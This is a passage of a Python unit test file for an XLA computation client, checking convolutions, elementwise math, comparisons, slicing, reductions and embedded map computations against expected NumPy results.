pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(c.Constant(np.transpose(lhs, (0, 2, 3, 1))),
c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]],
[[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.xla_data_pb2.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = padding_config.dimensions.add()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
  # TODO(b/72689392): re-enable when the S32 bug is resolved
def DISABLED_testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
    self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().ExecuteWithPythonValues()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(c.Constant(a_vals), c.Constant(b_vals), left_side=False,
lower=True, transpose_a=True)
self._ExecuteAndCompareClose(c, expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
], dtype=np.float32), rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
class EmbeddedComputationsTest(LocalComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
    _ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
